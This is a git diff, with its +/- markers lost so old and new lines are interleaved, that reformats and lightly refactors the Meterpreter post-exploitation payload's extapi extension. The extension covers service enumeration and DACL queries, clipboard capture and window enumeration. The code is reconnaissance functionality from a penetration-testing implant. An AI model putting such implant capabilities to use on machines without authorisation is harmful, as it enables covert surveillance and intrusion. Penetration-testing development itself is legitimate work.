if( pStream->Stat( &stat, STATFLAG_NONAME ) != S_OK )
BREAK_WITH_ERROR( "Failed to get image stat", ERROR_FUNCTION_FAILED );
if (pStream->Stat(&stat, STATFLAG_NONAME) != S_OK)
BREAK_WITH_ERROR("Failed to get image stat", ERROR_FUNCTION_FAILED);
// if the image requires the quadpart, then we're in trouble anyway!
pImage->dwImageBufferSize = stat.cbSize.LowPart;
if( (pImage->pImageBuffer = (LPBYTE)malloc( pImage->dwImageBufferSize ) ) == NULL )
BREAK_WITH_ERROR( "Failed to allocate memory for the JPEG", ERROR_OUTOFMEMORY );
if ((pImage->pImageBuffer = (LPBYTE)malloc(pImage->dwImageBufferSize)) == NULL)
BREAK_WITH_ERROR("Failed to allocate memory for the JPEG", ERROR_OUTOFMEMORY);
ULARGE_INTEGER pos;
LARGE_INTEGER zero;
zero.QuadPart = 0;
pos.QuadPart = 0;
if( pStream->Seek( zero, STREAM_SEEK_SET, &pos ) != S_OK )
BREAK_WITH_ERROR( "Failed set stream position", ERROR_FUNCTION_FAILED );
if (pStream->Seek(zero, STREAM_SEEK_SET, &pos) != S_OK)
BREAK_WITH_ERROR("Failed set stream position", ERROR_FUNCTION_FAILED);
ULONG bytesRead = 0;
if( (hRes = pStream->Read( pImage->pImageBuffer, pImage->dwImageBufferSize, &bytesRead ) != S_OK) ) {
dprintf( "Failed to read image data from stream: %u %x", hRes, hRes );
if ((hRes = pStream->Read(pImage->pImageBuffer, pImage->dwImageBufferSize, &bytesRead) != S_OK)) {
dprintf("Failed to read image data from stream: %u %x", hRes, hRes);
dwResult = ERROR_FUNCTION_FAILED;
break;
}
if( bytesRead != pImage->dwImageBufferSize )
BREAK_WITH_ERROR( "Failed to read image data from stream", ERROR_FUNCTION_FAILED );
} while(0);
if (bytesRead != pImage->dwImageBufferSize)
BREAK_WITH_ERROR("Failed to read image data from stream", ERROR_FUNCTION_FAILED);
} while (0);
if( dwResult != ERROR_SUCCESS && pImage->pImageBuffer != NULL ) {
free( pImage->pImageBuffer );
if (dwResult != ERROR_SUCCESS && pImage->pImageBuffer != NULL) {
free(pImage->pImageBuffer);
pImage->pImageBuffer = NULL;
}
if( pStream != NULL )
if (pStream != NULL)
pStream->Release();
if( pBitmap != NULL )
if (pBitmap != NULL)
delete pBitmap;
if( gdiPlusToken != 0 )
GdiplusShutdown( gdiPlusToken );
if (gdiPlusToken != 0)
GdiplusShutdown(gdiPlusToken);
return dwResult;
}
}

10
c/meterpreter/source/extensions/extapi/clipboard_image.h
View File

@ -9,14 +9,14 @@ typedef struct _ConvertedImage
{
/*!
* @brief Pointer to a pointer which will receive the JPEG image data buffer.
* This value is allocated using \c malloc prior to returning. If after
* calling this function the value is non-NULL the caller must call
* \c free to release this memory.
*/
* This value is allocated using \c malloc prior to returning. If after
* calling this function the value is non-NULL the caller must call
* \c free to release this memory.
*/
PBYTE pImageBuffer;
DWORD dwImageBufferSize;
} ConvertedImage;
DWORD convert_to_jpg( const LPBITMAPINFO lpBI, const LPVOID lpDIB, ULONG ulQuality, ConvertedImage* pImage );
DWORD convert_to_jpg(const LPBITMAPINFO lpBI, const LPVOID lpDIB, ULONG ulQuality, ConvertedImage* pImage);
#endif

35
c/meterpreter/source/extensions/extapi/extapi.c
View File

@ -19,34 +19,12 @@ EnableDelayLoadMetSrv();
Command customCommands[] =
{
// Window management and enumeration
{ "extapi_window_enum",
{ request_window_enum, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER }
},
// Service management and enumeration
{ "extapi_service_enum",
{ request_service_enum, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER }
},
{ "extapi_service_query",
{ request_service_query, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER }
},
// Clipboard interaction
{ "extapi_clipboard_get_data",
{ request_clipboard_get_data, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER }
},
{ "extapi_clipboard_set_data",
{ request_clipboard_set_data, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER }
},
// Terminator
{ NULL,
{ EMPTY_DISPATCH_HANDLER },
{ EMPTY_DISPATCH_HANDLER }
}
COMMAND_REQ("extapi_window_enum", request_window_enum),
COMMAND_REQ("extapi_service_enum", request_service_enum),
COMMAND_REQ("extapi_service_query", request_service_query),
COMMAND_REQ("extapi_clipboard_get_data", request_clipboard_get_data),
COMMAND_REQ("extapi_clipboard_set_data", request_clipboard_set_data),
COMMAND_TERMINATOR
};
/*!
@ -76,4 +54,3 @@ DWORD __declspec(dllexport) DeinitServerExtension(Remote *remote)
return ERROR_SUCCESS;
}

338
c/meterpreter/source/extensions/extapi/service.c
View File

@ -8,9 +8,9 @@
#ifdef _WIN32
#include <Sddl.h>
typedef SC_HANDLE (WINAPI * POPENSCMANAGERA)( LPCSTR lpMachineName, LPCSTR lpDatabaseName, DWORD dwDesiredAccess );
typedef BOOL (WINAPI * PCLOSESERVICEHANDLE)( SC_HANDLE hSCObject );
typedef BOOL (WINAPI * PENUMSERVICESSTATUSEXA)(
typedef SC_HANDLE(WINAPI * POPENSCMANAGERA)(LPCSTR lpMachineName, LPCSTR lpDatabaseName, DWORD dwDesiredAccess);
typedef BOOL(WINAPI * PCLOSESERVICEHANDLE)(SC_HANDLE hSCObject);
typedef BOOL(WINAPI * PENUMSERVICESSTATUSEXA)(
SC_HANDLE hSCManager,
SC_ENUM_TYPE InfoLevel,
DWORD dwServiceType,
@ -22,21 +22,21 @@ typedef BOOL (WINAPI * PENUMSERVICESSTATUSEXA)(
LPDWORD lpResumeHandle,
LPCSTR pszGroupName
);
typedef SC_HANDLE (WINAPI * POPENSERVICEA)( SC_HANDLE hSCManager, LPCSTR lpServiceName, DWORD dwDesiredAcces );
typedef BOOL (WINAPI * PQUERYSERVICEOBJECTSECURITY)(
typedef SC_HANDLE(WINAPI * POPENSERVICEA)(SC_HANDLE hSCManager, LPCSTR lpServiceName, DWORD dwDesiredAcces);
typedef BOOL(WINAPI * PQUERYSERVICEOBJECTSECURITY)(
SC_HANDLE hService,
SECURITY_INFORMATION dwSecurityInformation,
PSECURITY_DESCRIPTOR lpSecurityDescriptor,
DWORD cbBufSize,
LPDWORD pcbBytesNeeded
);
typedef BOOL (WINAPI * PQUERYSERVICECONFIGA)(
typedef BOOL(WINAPI * PQUERYSERVICECONFIGA)(
SC_HANDLE hService,
LPQUERY_SERVICE_CONFIGA lpServiceConfig,
DWORD dbBufSize,
LPDWORD pcbBytesNeeded
);
typedef BOOL (WINAPI * PCSDTSSDA)(
typedef BOOL(WINAPI * PCSDTSSDA)(
PSECURITY_DESCRIPTOR SecurityDescriptor,
DWORD RequestedStringSDRevision,
SECURITY_INFORMATION SecurityInformation,
@ -44,34 +44,35 @@ typedef BOOL (WINAPI * PCSDTSSDA)(
PULONG StringSecurityDescriptorLen
);
VOID add_enumerated_service( Packet *pResponse, LPCSTR cpName, LPCSTR cpDisplayName, DWORD dwProcessId, DWORD dwStatus, BOOL bInteractive );
DWORD get_service_config( HMODULE hAdvapi32, SC_HANDLE scService, Packet *pResponse );
DWORD get_service_dacl( HMODULE hAdvapi32, SC_HANDLE scService, Packet *pResponse );
VOID add_enumerated_service(Packet *pResponse, LPCSTR cpName, LPCSTR cpDisplayName, DWORD dwProcessId, DWORD dwStatus, BOOL bInteractive);
DWORD query_service(LPCSTR cpServiceName, Packet *pResponse);
DWORD get_service_config(HMODULE hAdvapi32, SC_HANDLE scService, Packet *pResponse);
DWORD get_service_dacl(HMODULE hAdvapi32, SC_HANDLE scService, Packet *pResponse);
#endif
DWORD enumerate_services( Packet *response );
DWORD enumerate_services(Packet *response);
DWORD request_service_enum(Remote *remote, Packet *packet)
{
DWORD dwResult = ERROR_SUCCESS;
Packet * response = packet_create_response( packet );
Packet * response = packet_create_response(packet);
do
{
if( !response ) {
dprintf( "Unable to create response packet" );
if (!response) {
dprintf("Unable to create response packet");
dwResult = ERROR_OUTOFMEMORY;
break;
}
dprintf( "Beginning service enumeration" );
dwResult = enumerate_services( response );
dprintf("Beginning service enumeration");
dwResult = enumerate_services(response);
} while(0);
} while (0);
dprintf( "Transmitting response back to caller." );
if( response )
packet_transmit_response( dwResult, remote, response );
dprintf("Transmitting response back to caller.");
if (response)
packet_transmit_response(dwResult, remote, response);
return dwResult;
}
@ -80,33 +81,33 @@ DWORD request_service_query(Remote *remote, Packet *packet)
{
LPSTR lpServiceName = NULL;
DWORD dwResult = ERROR_SUCCESS;
Packet * response = packet_create_response( packet );
Packet * response = packet_create_response(packet);
do
{
if( !response ) {
dprintf( "Unable to create response packet" );
if (!response) {
dprintf("Unable to create response packet");
dwResult = ERROR_OUTOFMEMORY;
break;
}
lpServiceName = packet_get_tlv_value_string( packet, TLV_TYPE_EXT_SERVICE_ENUM_NAME );
if( !lpServiceName )
BREAK_WITH_ERROR( "Missing service name parameter", ERROR_BAD_ARGUMENTS );
lpServiceName = packet_get_tlv_value_string(packet, TLV_TYPE_EXT_SERVICE_ENUM_NAME);
if (!lpServiceName)
BREAK_WITH_ERROR("Missing service name parameter", ERROR_BAD_ARGUMENTS);
dprintf( "Beginning service enumeration" );
dwResult = query_service( lpServiceName, response );
dprintf("Beginning service enumeration");
dwResult = query_service(lpServiceName, response);
} while(0);
} while (0);
dprintf( "Transmitting response back to caller." );
if( response )
packet_transmit_response( dwResult, remote, response );
dprintf("Transmitting response back to caller.");
if (response)
packet_transmit_response(dwResult, remote, response);
return dwResult;
}
DWORD query_service( LPCSTR cpServiceName, Packet *pResponse )
DWORD query_service(LPCSTR cpServiceName, Packet *pResponse)
{
#ifdef _WIN32
// currently we only support Windoze
@ -121,43 +122,46 @@ DWORD query_service( LPCSTR cpServiceName, Packet *pResponse )
do
{
dprintf( "Loading advapi32.dll" );
if( (hAdvapi32 = LoadLibraryA( "advapi32.dll" )) == NULL)
BREAK_ON_ERROR( "Unable to load advapi32.dll" );
dprintf("Loading advapi32.dll");
if ((hAdvapi32 = LoadLibraryA("advapi32.dll")) == NULL)
BREAK_ON_ERROR("Unable to load advapi32.dll");
dprintf( "Searching for OpenSCManagerA" );
if( (pOpenSCManagerA = (POPENSCMANAGERA)GetProcAddress( hAdvapi32, "OpenSCManagerA" )) == NULL )
BREAK_ON_ERROR( "Unable to locate OpenSCManagerA in advapi32.dll" );
dprintf("Searching for OpenSCManagerA");
if ((pOpenSCManagerA = (POPENSCMANAGERA)GetProcAddress(hAdvapi32, "OpenSCManagerA")) == NULL)
BREAK_ON_ERROR("Unable to locate OpenSCManagerA in advapi32.dll");
dprintf( "Searching for CloseServiceHandle" );
if( (pCloseServiceHandle = (PCLOSESERVICEHANDLE)GetProcAddress( hAdvapi32, "CloseServiceHandle" )) == NULL )
dprintf( "Unable to locate CloseServiceHandle in advapi32.dll. Continuing anyway." );
dprintf("Searching for CloseServiceHandle");
if ((pCloseServiceHandle = (PCLOSESERVICEHANDLE)GetProcAddress(hAdvapi32, "CloseServiceHandle")) == NULL)
dprintf("Unable to locate CloseServiceHandle in advapi32.dll. Continuing anyway.");
dprintf( "Searching for OpenServiceA" );
if( (pOpenServiceA = (POPENSERVICEA)GetProcAddress( hAdvapi32, "OpenServiceA" )) == NULL )
BREAK_ON_ERROR( "Unable to locate OpenServiceA in advapi32.dll." );
dprintf("Searching for OpenServiceA");
if ((pOpenServiceA = (POPENSERVICEA)GetProcAddress(hAdvapi32, "OpenServiceA")) == NULL)
BREAK_ON_ERROR("Unable to locate OpenServiceA in advapi32.dll.");
dprintf( "Opening the Service Control manager" );
if( (scManager = pOpenSCManagerA( NULL, SERVICES_ACTIVE_DATABASEA, SC_MANAGER_CONNECT|GENERIC_READ )) == NULL )
BREAK_ON_ERROR( "Unable to open the service control manager" );
dprintf("Opening the Service Control manager");
if ((scManager = pOpenSCManagerA(NULL, SERVICES_ACTIVE_DATABASEA, SC_MANAGER_CONNECT | GENERIC_READ)) == NULL)
BREAK_ON_ERROR("Unable to open the service control manager");
dprintf( "Opening the Service: %s", cpServiceName );
if( (scService = pOpenServiceA( scManager, cpServiceName, SC_MANAGER_CONNECT|GENERIC_READ )) == NULL )
BREAK_ON_ERROR( "Unable to open the service: %s", cpServiceName );
dprintf("Opening the Service: %s", cpServiceName);
if ((scService = pOpenServiceA(scManager, cpServiceName, SC_MANAGER_CONNECT | GENERIC_READ)) == NULL) {
dwResult = GetLastError();
dprintf("Unable to open the service: %s (%u)", cpServiceName, dwResult);
break;
}
get_service_config( hAdvapi32, scService, pResponse );
get_service_dacl( hAdvapi32, scService, pResponse );
get_service_config(hAdvapi32, scService, pResponse);
get_service_dacl(hAdvapi32, scService, pResponse);
} while(0);
} while (0);
if( scService && pCloseServiceHandle )
pCloseServiceHandle( scService );
if (scService && pCloseServiceHandle)
pCloseServiceHandle(scService);
if( scManager && pCloseServiceHandle )
pCloseServiceHandle( scManager );
if (scManager && pCloseServiceHandle)
pCloseServiceHandle(scManager);
if( hAdvapi32 )
FreeLibrary( hAdvapi32 );
if (hAdvapi32)
FreeLibrary(hAdvapi32);
return dwResult;
#else
@ -165,7 +169,7 @@ DWORD query_service( LPCSTR cpServiceName, Packet *pResponse )
#endif
}
DWORD enumerate_services( Packet *pResponse )
DWORD enumerate_services(Packet *pResponse)
{
#ifdef _WIN32
// currently we only support Windoze
@ -185,63 +189,63 @@ DWORD enumerate_services( Packet *pResponse )
do
{
dprintf( "Loading advapi32.dll" );
if( (hAdvapi32 = LoadLibraryA( "advapi32.dll" )) == NULL)
BREAK_ON_ERROR( "Unable to load advapi32.dll" );
dprintf("Loading advapi32.dll");
if ((hAdvapi32 = LoadLibraryA("advapi32.dll")) == NULL)
BREAK_ON_ERROR("Unable to load advapi32.dll");
dprintf( "Searching for OpenSCManagerA" );
if( (pOpenSCManagerA = (POPENSCMANAGERA)GetProcAddress( hAdvapi32, "OpenSCManagerA" )) == NULL )
BREAK_ON_ERROR( "Unable to locate OpenSCManagerA in advapi32.dll" );
dprintf("Searching for OpenSCManagerA");
if ((pOpenSCManagerA = (POPENSCMANAGERA)GetProcAddress(hAdvapi32, "OpenSCManagerA")) == NULL)
BREAK_ON_ERROR("Unable to locate OpenSCManagerA in advapi32.dll");
dprintf( "Searching for CloseServiceHandle" );
if( (pCloseServiceHandle = (PCLOSESERVICEHANDLE)GetProcAddress( hAdvapi32, "CloseServiceHandle" )) == NULL )
dprintf( "Unable to locate CloseServiceHandle in advapi32.dll. Continuing anyway." );
dprintf("Searching for CloseServiceHandle");
if ((pCloseServiceHandle = (PCLOSESERVICEHANDLE)GetProcAddress(hAdvapi32, "CloseServiceHandle")) == NULL)
dprintf("Unable to locate CloseServiceHandle in advapi32.dll. Continuing anyway.");
dprintf( "Searching for EnumServicesStatusExA" );
if( (pEnumServicesStatusExA = (PENUMSERVICESSTATUSEXA)GetProcAddress( hAdvapi32, "EnumServicesStatusExA" )) == NULL )
BREAK_ON_ERROR( "Unable to locate EnumServicesStatusExA in advapi32.dll." );
dprintf("Searching for EnumServicesStatusExA");
if ((pEnumServicesStatusExA = (PENUMSERVICESSTATUSEXA)GetProcAddress(hAdvapi32, "EnumServicesStatusExA")) == NULL)
BREAK_ON_ERROR("Unable to locate EnumServicesStatusExA in advapi32.dll.");
// TODO: add support for other machine names so that this instance can query other machines on the network.
dprintf( "Opening the Service Control manager" );
if( (scManager = pOpenSCManagerA( NULL, SERVICES_ACTIVE_DATABASEA, SC_MANAGER_CONNECT|GENERIC_READ )) == NULL )
BREAK_ON_ERROR( "Unable to open the service control manager" );
dprintf("Opening the Service Control manager");
if ((scManager = pOpenSCManagerA(NULL, SERVICES_ACTIVE_DATABASEA, SC_MANAGER_CONNECT | GENERIC_READ)) == NULL)
BREAK_ON_ERROR("Unable to open the service control manager");
bResult = pEnumServicesStatusExA( scManager, SC_ENUM_PROCESS_INFO, SERVICE_WIN32, SERVICE_STATE_ALL, NULL, 0,
bResult = pEnumServicesStatusExA(scManager, SC_ENUM_PROCESS_INFO, SERVICE_WIN32, SERVICE_STATE_ALL, NULL, 0,
&dwBytesNeeded, &dwServicesReturned, &dwResumeHandle, NULL);
if( !bResult && dwBytesNeeded )
if (!bResult && dwBytesNeeded)
{
pSsInfo = (ENUM_SERVICE_STATUS_PROCESSA*)malloc( dwBytesNeeded );
pSsInfo = (ENUM_SERVICE_STATUS_PROCESSA*)malloc(dwBytesNeeded);
if( !pSsInfo )
BREAK_ON_ERROR( "Out of memory" );
if (!pSsInfo)
BREAK_ON_ERROR("Out of memory");
bResult = pEnumServicesStatusExA( scManager, SC_ENUM_PROCESS_INFO, SERVICE_WIN32, SERVICE_STATE_ALL, (LPBYTE)pSsInfo, dwBytesNeeded,
bResult = pEnumServicesStatusExA(scManager, SC_ENUM_PROCESS_INFO, SERVICE_WIN32, SERVICE_STATE_ALL, (LPBYTE)pSsInfo, dwBytesNeeded,
&dwBytesNeeded, &dwServicesReturned, &dwResumeHandle, NULL);
}
if( !bResult )
BREAK_ON_ERROR( "Failed to enumerate services" );
if (!bResult)
BREAK_ON_ERROR("Failed to enumerate services");
dprintf( "%s with %u entries returned", ( bResult ? "succeeded" : "failed"), dwServicesReturned );
dprintf("%s with %u entries returned", (bResult ? "succeeded" : "failed"), dwServicesReturned);
for( dwServiceIndex = 0; dwServiceIndex < dwServicesReturned; ++dwServiceIndex )
for (dwServiceIndex = 0; dwServiceIndex < dwServicesReturned; ++dwServiceIndex)
{
add_enumerated_service( pResponse, pSsInfo[dwServiceIndex].lpServiceName, pSsInfo[dwServiceIndex].lpDisplayName,
add_enumerated_service(pResponse, pSsInfo[dwServiceIndex].lpServiceName, pSsInfo[dwServiceIndex].lpDisplayName,
pSsInfo[dwServiceIndex].ServiceStatusProcess.dwProcessId, pSsInfo[dwServiceIndex].ServiceStatusProcess.dwCurrentState,
pSsInfo[dwServiceIndex].ServiceStatusProcess.dwServiceType & SERVICE_INTERACTIVE_PROCESS );
pSsInfo[dwServiceIndex].ServiceStatusProcess.dwServiceType & SERVICE_INTERACTIVE_PROCESS);
}
} while(0);
} while (0);
if( pSsInfo )
free( pSsInfo );
if (pSsInfo)
free(pSsInfo);
if( scManager && pCloseServiceHandle )
pCloseServiceHandle( scManager );
if (scManager && pCloseServiceHandle)
pCloseServiceHandle(scManager);
if( hAdvapi32 )
FreeLibrary( hAdvapi32 );
if (hAdvapi32)
FreeLibrary(hAdvapi32);
return dwResult;
#else
@ -250,41 +254,41 @@ DWORD enumerate_services( Packet *pResponse )
}
#ifdef _WIN32
VOID add_enumerated_service( Packet *pResponse, LPCSTR cpName, LPCSTR cpDisplayName, DWORD dwProcessId, DWORD dwStatus, BOOL bInteractive )
VOID add_enumerated_service(Packet *pResponse, LPCSTR cpName, LPCSTR cpDisplayName, DWORD dwProcessId, DWORD dwStatus, BOOL bInteractive)
{
Tlv entries[5] = {0};
dprintf( "Adding Name: %s", cpName );
entries[0].header.type = TLV_TYPE_EXT_SERVICE_ENUM_NAME;
entries[0].header.length = (DWORD)strlen( cpName ) + 1;
entries[0].buffer = (PUCHAR)cpName;
Tlv entries[5] = { 0 };
dprintf("Adding Name: %s", cpName);
entries[0].header.type = TLV_TYPE_EXT_SERVICE_ENUM_NAME;
entries[0].header.length = (DWORD)strlen(cpName) + 1;
entries[0].buffer = (PUCHAR)cpName;
dprintf( "Adding Display Name: %s", cpDisplayName );
entries[1].header.type = TLV_TYPE_EXT_SERVICE_ENUM_DISPLAYNAME;
entries[1].header.length = (DWORD)strlen( cpDisplayName ) + 1;
entries[1].buffer = (PUCHAR)cpDisplayName;
dprintf("Adding Display Name: %s", cpDisplayName);
entries[1].header.type = TLV_TYPE_EXT_SERVICE_ENUM_DISPLAYNAME;
entries[1].header.length = (DWORD)strlen(cpDisplayName) + 1;
entries[1].buffer = (PUCHAR)cpDisplayName;
dprintf( "Adding PID: %u", dwProcessId );
dwProcessId = htonl( dwProcessId );
entries[2].header.type = TLV_TYPE_EXT_SERVICE_ENUM_PID;
entries[2].header.length = sizeof( DWORD );
entries[2].buffer = (PUCHAR)&dwProcessId;
dprintf("Adding PID: %u", dwProcessId);
dwProcessId = htonl(dwProcessId);
entries[2].header.type = TLV_TYPE_EXT_SERVICE_ENUM_PID;
entries[2].header.length = sizeof(DWORD);
entries[2].buffer = (PUCHAR)&dwProcessId;
dprintf( "Adding Status: %u", dwStatus );
dwStatus = htonl( dwStatus );
entries[3].header.type = TLV_TYPE_EXT_SERVICE_ENUM_STATUS;
entries[3].header.length = sizeof( DWORD );
entries[3].buffer = (PUCHAR)&dwStatus;
dprintf("Adding Status: %u", dwStatus);
dwStatus = htonl(dwStatus);
entries[3].header.type = TLV_TYPE_EXT_SERVICE_ENUM_STATUS;
entries[3].header.length = sizeof(DWORD);
entries[3].buffer = (PUCHAR)&dwStatus;
dprintf( "Adding Status: %s", (bInteractive ? "TRUE" : "FALSE" ) );
entries[4].header.type = TLV_TYPE_EXT_SERVICE_ENUM_INTERACTIVE;
entries[4].header.length = sizeof( BOOL );
entries[4].buffer = (PUCHAR)&bInteractive;
dprintf("Adding Status: %s", (bInteractive ? "TRUE" : "FALSE"));
entries[4].header.type = TLV_TYPE_EXT_SERVICE_ENUM_INTERACTIVE;
entries[4].header.length = sizeof(BOOL);
entries[4].buffer = (PUCHAR)&bInteractive;
dprintf( "Adding group to response" );
packet_add_tlv_group( pResponse, TLV_TYPE_EXT_SERVICE_ENUM_GROUP, entries, 5 );
dprintf("Adding group to response");
packet_add_tlv_group(pResponse, TLV_TYPE_EXT_SERVICE_ENUM_GROUP, entries, 5);
}
DWORD get_service_config( HMODULE hAdvapi32, SC_HANDLE scService, Packet *pResponse )
DWORD get_service_config(HMODULE hAdvapi32, SC_HANDLE scService, Packet *pResponse)
{
DWORD dwResult = ERROR_SUCCESS;
PQUERYSERVICECONFIGA pQueryServiceConfigA = NULL;
@ -293,39 +297,39 @@ DWORD get_service_config( HMODULE hAdvapi32, SC_HANDLE scService, Packet *pRespo
do
{
dprintf( "Searching for QueryServiceConfigA" );
if( (pQueryServiceConfigA = (PQUERYSERVICECONFIGA)GetProcAddress( hAdvapi32, "QueryServiceConfigA" )) == NULL )
BREAK_ON_ERROR( "Unable to locate QueryServiceConfigA in advapi32.dll." );
dprintf("Searching for QueryServiceConfigA");
if ((pQueryServiceConfigA = (PQUERYSERVICECONFIGA)GetProcAddress(hAdvapi32, "QueryServiceConfigA")) == NULL)
BREAK_ON_ERROR("Unable to locate QueryServiceConfigA in advapi32.dll.");
if( pQueryServiceConfigA( scService, NULL, 0, &cbBytesNeeded ) )
BREAK_ON_ERROR( "This query should have failed" );
if (pQueryServiceConfigA(scService, NULL, 0, &cbBytesNeeded))
BREAK_ON_ERROR("This query should have failed");
if( GetLastError() != ERROR_INSUFFICIENT_BUFFER )
BREAK_ON_ERROR( "Unexpected error from QueryServiceConfigA" );
if (GetLastError() != ERROR_INSUFFICIENT_BUFFER)
BREAK_ON_ERROR("Unexpected error from QueryServiceConfigA");
if( (lpServiceConfig = (LPQUERY_SERVICE_CONFIGA)malloc( cbBytesNeeded )) == NULL )
BREAK_ON_ERROR( "Out of memory" );
if ((lpServiceConfig = (LPQUERY_SERVICE_CONFIGA)malloc(cbBytesNeeded)) == NULL)
BREAK_ON_ERROR("Out of memory");
if( !pQueryServiceConfigA( scService, lpServiceConfig, cbBytesNeeded, &cbBytesNeeded ) )
BREAK_ON_ERROR( "QueryServiceConfigA failed" );
if (!pQueryServiceConfigA(scService, lpServiceConfig, cbBytesNeeded, &cbBytesNeeded))
BREAK_ON_ERROR("QueryServiceConfigA failed");
dprintf( "Start type: %u", lpServiceConfig->dwStartType );
packet_add_tlv_uint( pResponse, TLV_TYPE_EXT_SERVICE_QUERY_STARTTYPE, lpServiceConfig->dwStartType );
packet_add_tlv_string( pResponse, TLV_TYPE_EXT_SERVICE_QUERY_DISPLAYNAME, lpServiceConfig->lpDisplayName );
packet_add_tlv_string( pResponse, TLV_TYPE_EXT_SERVICE_QUERY_STARTNAME, lpServiceConfig->lpServiceStartName );
packet_add_tlv_string( pResponse, TLV_TYPE_EXT_SERVICE_QUERY_PATH, lpServiceConfig->lpBinaryPathName );
packet_add_tlv_string( pResponse, TLV_TYPE_EXT_SERVICE_QUERY_LOADORDERGROUP, lpServiceConfig->lpLoadOrderGroup ? lpServiceConfig->lpLoadOrderGroup : "" );
packet_add_tlv_bool( pResponse, TLV_TYPE_EXT_SERVICE_QUERY_INTERACTIVE, lpServiceConfig->dwServiceType & SERVICE_INTERACTIVE_PROCESS);
dprintf("Start type: %u", lpServiceConfig->dwStartType);
packet_add_tlv_uint(pResponse, TLV_TYPE_EXT_SERVICE_QUERY_STARTTYPE, lpServiceConfig->dwStartType);
packet_add_tlv_string(pResponse, TLV_TYPE_EXT_SERVICE_QUERY_DISPLAYNAME, lpServiceConfig->lpDisplayName);
packet_add_tlv_string(pResponse, TLV_TYPE_EXT_SERVICE_QUERY_STARTNAME, lpServiceConfig->lpServiceStartName);
packet_add_tlv_string(pResponse, TLV_TYPE_EXT_SERVICE_QUERY_PATH, lpServiceConfig->lpBinaryPathName);
packet_add_tlv_string(pResponse, TLV_TYPE_EXT_SERVICE_QUERY_LOADORDERGROUP, lpServiceConfig->lpLoadOrderGroup ? lpServiceConfig->lpLoadOrderGroup : "");
packet_add_tlv_bool(pResponse, TLV_TYPE_EXT_SERVICE_QUERY_INTERACTIVE, lpServiceConfig->dwServiceType & SERVICE_INTERACTIVE_PROCESS);
} while(0);
} while (0);
if( lpServiceConfig )
free( lpServiceConfig );
if (lpServiceConfig)
free(lpServiceConfig);
return dwResult;
}
DWORD get_service_dacl( HMODULE hAdvapi32, SC_HANDLE scService, Packet *pResponse )
DWORD get_service_dacl(HMODULE hAdvapi32, SC_HANDLE scService, Packet *pResponse)
{
DWORD dwResult = ERROR_SUCCESS;
DWORD dwBytesNeeded = 0;
@ -336,38 +340,38 @@ DWORD get_service_dacl( HMODULE hAdvapi32, SC_HANDLE scService, Packet *pRespons
do
{
dprintf( "Searching for QueryServiceObjectSecurity" );
if( (pQueryServiceObjectSecurity = (PQUERYSERVICEOBJECTSECURITY)GetProcAddress( hAdvapi32, "QueryServiceObjectSecurity" )) == NULL )
BREAK_ON_ERROR( "Unable to locate QueryServiceObjectSecurity in advapi32.dll." );
dprintf("Searching for QueryServiceObjectSecurity");
if ((pQueryServiceObjectSecurity = (PQUERYSERVICEOBJECTSECURITY)GetProcAddress(hAdvapi32, "QueryServiceObjectSecurity")) == NULL)
BREAK_ON_ERROR("Unable to locate QueryServiceObjectSecurity in advapi32.dll.");
dprintf( "Searching for ConvertSecurityDescriptorToStringSecurityDescriptorA" );
if( (pCSDTSSDA = (PCSDTSSDA)GetProcAddress( hAdvapi32, "ConvertSecurityDescriptorToStringSecurityDescriptorA" )) == NULL )
BREAK_ON_ERROR( "Unable to locate ConvertSecurityDescriptorToStringSecurityDescriptorA in advapi32.dll." );
dprintf("Searching for ConvertSecurityDescriptorToStringSecurityDescriptorA");
if ((pCSDTSSDA = (PCSDTSSDA)GetProcAddress(hAdvapi32, "ConvertSecurityDescriptorToStringSecurityDescriptorA")) == NULL)
BREAK_ON_ERROR("Unable to locate ConvertSecurityDescriptorToStringSecurityDescriptorA in advapi32.dll.");
if( pQueryServiceObjectSecurity( scService, DACL_SECURITY_INFORMATION, (PSECURITY_DESCRIPTOR)&pSecurityDescriptor, 0, &dwBytesNeeded ) )
BREAK_ON_ERROR( "Call should have failed" );
if (pQueryServiceObjectSecurity(scService, DACL_SECURITY_INFORMATION, (PSECURITY_DESCRIPTOR)&pSecurityDescriptor, 0, &dwBytesNeeded))
BREAK_ON_ERROR("Call should have failed");
if( GetLastError() != ERROR_INSUFFICIENT_BUFFER )
BREAK_ON_ERROR( "Unexpected error getting security" );
if (GetLastError() != ERROR_INSUFFICIENT_BUFFER)
BREAK_ON_ERROR("Unexpected error getting security");
if( (pSecurityDescriptor = (PSECURITY_DESCRIPTOR)malloc( dwBytesNeeded )) == NULL )
BREAK_WITH_ERROR( "Out of memory", ERROR_OUTOFMEMORY );
if ((pSecurityDescriptor = (PSECURITY_DESCRIPTOR)malloc(dwBytesNeeded)) == NULL)
BREAK_WITH_ERROR("Out of memory", ERROR_OUTOFMEMORY);
if( !pQueryServiceObjectSecurity( scService, DACL_SECURITY_INFORMATION, pSecurityDescriptor, dwBytesNeeded, &dwBytesNeeded ) )
BREAK_ON_ERROR( "Unable to query security information for DACL_SECURITY_INFORMATION" );
if (!pQueryServiceObjectSecurity(scService, DACL_SECURITY_INFORMATION, pSecurityDescriptor, dwBytesNeeded, &dwBytesNeeded))
BREAK_ON_ERROR("Unable to query security information for DACL_SECURITY_INFORMATION");
if( !pCSDTSSDA( pSecurityDescriptor, SDDL_REVISION_1, DACL_SECURITY_INFORMATION, &lpDaclString, NULL ) )
BREAK_ON_ERROR( "Unable to get DACL string" );
packet_add_tlv_string( pResponse, TLV_TYPE_EXT_SERVICE_QUERY_DACL, lpDaclString );
if (!pCSDTSSDA(pSecurityDescriptor, SDDL_REVISION_1, DACL_SECURITY_INFORMATION, &lpDaclString, NULL))
BREAK_ON_ERROR("Unable to get DACL string");
} while(0);
packet_add_tlv_string(pResponse, TLV_TYPE_EXT_SERVICE_QUERY_DACL, lpDaclString);
if( lpDaclString )
LocalFree( lpDaclString );
} while (0);
if( pSecurityDescriptor )
free( pSecurityDescriptor );
if (lpDaclString)
LocalFree(lpDaclString);
if (pSecurityDescriptor)
free(pSecurityDescriptor);
return dwResult;
}

141
c/meterpreter/source/extensions/extapi/window.c
View File

@ -5,8 +5,8 @@
#include "extapi.h"
#include "window.h"
VOID add_enumerated_window( Packet *pResponse, QWORD qwHandle, const char* lpWindowTitle, DWORD dwProcessId );
DWORD enumerate_windows( Packet *response );
